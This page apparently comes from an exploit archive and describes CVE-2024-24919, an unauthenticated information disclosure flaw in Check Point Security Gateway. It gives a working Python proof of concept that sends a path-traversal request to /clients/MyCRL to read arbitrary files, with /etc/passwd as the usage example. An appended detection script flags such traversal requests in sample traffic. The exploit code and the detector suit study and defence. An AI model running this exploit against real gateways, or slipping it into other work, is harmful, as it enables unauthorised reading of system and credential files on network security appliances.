Check Point Security Gateway Information Disclosure
Check Point Security Gateway suffers from an information disclosure vulnerability. Versions affected include R77.20 (EOL), R77.30 (EOL), R80.10 (EOL), R80.20 (EOL), R80.20.x, R80.20SP (EOL), R80.30 (EOL), R80.30SP (EOL), R80.40 (EOL), R81, R81.10, R81.10.x, and R81.20.
# Exploit Title: Check Point Security Gateway - Information Disclosure (Unauthenticated)
# Exploit Author: Yesith Alvarez
# Vendor Homepage: https://support.checkpoint.com/results/sk/sk182336
# Version: R77.20 (EOL), R77.30 (EOL), R80.10 (EOL), R80.20 (EOL), R80.20.x, R80.20SP (EOL), R80.30 (EOL), R80.30SP (EOL), R80.40 (EOL), R81, R81.10, R81.10.x, R81.20
# CVE : CVE-2024-24919

from requests import Request, Session
import sys
import json


def title():
    # Raw string so the backslashes in the banner are printed literally.
    print(r'''
   _______      ________    ___   ___ ___  _  _        ___  _  _   ___  __  ___
  / ____\ \    / /  ____|  |__ \ / _ \__ \| || |      |__ \| || | / _ \/_ |/ _ \
 | |     \ \  / /| |__ ______ ) | | | | ) | || |_ ______ ) | || || (_) || | (_) |
 | |      \ \/ / |  __|______/ /| | | |/ /|__   _|______/ /|__   _\__, || |\__, |
 | |____   \  /  | |____    / /_| |_| / /_   | |       / /_   | |   / / | |  / /
  \_____|   \/   |______|  |____|\___/____|  |_|      |____|  |_|  /_/  |_| /_/

Author: Yesith Alvarez
Github: https://github.com/yealvarez
Linkedin: https://www.linkedin.com/in/pentester-ethicalhacker/
    ''')


def exploit(url, path):
    # Endpoint targeted by the PoC.
    url = url + '/clients/MyCRL'
    # Request body: traversal prefix followed by the requested file path.
    data = "aCSHELL/../../../../../../../../../../.." + path
    headers = {
        'Connection': 'keep-alive',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0'
    }
    s = Session()
    req = Request('POST', url, data=data, headers=headers)
    prepped = req.prepare()
    #del prepped.headers['Content-Type']
    # Certificate verification is disabled, as in the original.
    resp = s.send(prepped, verify=False, timeout=15)
    print(prepped.headers)
    print(url)
    print(resp.headers)
    print(resp.status_code)


if __name__ == '__main__':
    title()
    if(len(sys.argv) < 3):
        print('[+] USAGE: python3 %s https://<target_url> path\n'%(sys.argv[0]))
        print('[+] EXAMPLE: python3 %s https://192.168.0.10 "/etc/passwd"\n'%(sys.argv[0]))
        sys.exit(0)
    else:
        exploit(sys.argv[1],sys.argv[2])
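
A detection-side counterpart to the PoC above, as an added example that is not part of the original advisory or the author's code: it flags captured requests that POST a `../` body to `/clients/MyCRL` and reports the file the traversal resolves to. The function names, the sample requests, the `gw.example` host and the percent-decoding step are assumptions made for illustration.

```python
import posixpath
from urllib.parse import unquote, urlsplit

ENDPOINT = "/clients/MyCRL"  # endpoint used by the PoC on this page


def parse_request(raw: bytes):
    """Split a raw HTTP/1.x request into (method, path, body), or None."""
    head, _, body = raw.partition(b"\r\n\r\n")
    parts = head.split(b"\r\n", 1)[0].decode("latin-1").split()
    if len(parts) != 3:
        return None
    return parts[0].upper(), urlsplit(parts[1]).path, body.decode("latin-1")


def traversal_target(raw: bytes):
    """Return the file a request's body resolves to, or None if not a match."""
    parsed = parse_request(raw)
    if parsed is None:
        return None
    method, path, body = parsed
    if method != "POST" or path.rstrip("/") != ENDPOINT:
        return None
    # Assumption: decode %2e/%2f and normalise backslashes before matching,
    # so encoded variants are flagged too (the page shows only the plain form).
    decoded = unquote(body).replace("\\", "/")
    if "../" not in decoded:
        return None
    # Collapse the dot segments against "/" to see where the path lands.
    return posixpath.normpath("/" + decoded)


def _req(line: str, body: str = "") -> bytes:
    return (f"{line}\r\nHost: gw.example\r\n"
            f"Content-Length: {len(body)}\r\n\r\n{body}").encode()


# Constructed sample traffic (not real captures).
SAMPLES = [
    _req("POST /clients/MyCRL HTTP/1.1", "aCSHELL/" + "../" * 11 + "etc/passwd"),
    _req("POST /clients/MyCRL HTTP/1.1", "aCSHELL/%2e%2e/%2e%2e/etc/passwd"),
    _req("POST /clients/MyCRL HTTP/1.1", "constructed-benign-body"),
    _req("GET /index.html HTTP/1.1"),
]

if __name__ == "__main__":
    for raw in SAMPLES:
        hit = traversal_target(raw)
        print("ALERT reads " + hit if hit else "ok", "|", raw.split(b"\r\n")[0].decode())
```

The same check can be applied to reverse-proxy or packet-capture exports that retain request bodies; access logs that record only the request line will show the POST to `/clients/MyCRL` but not the traversal string.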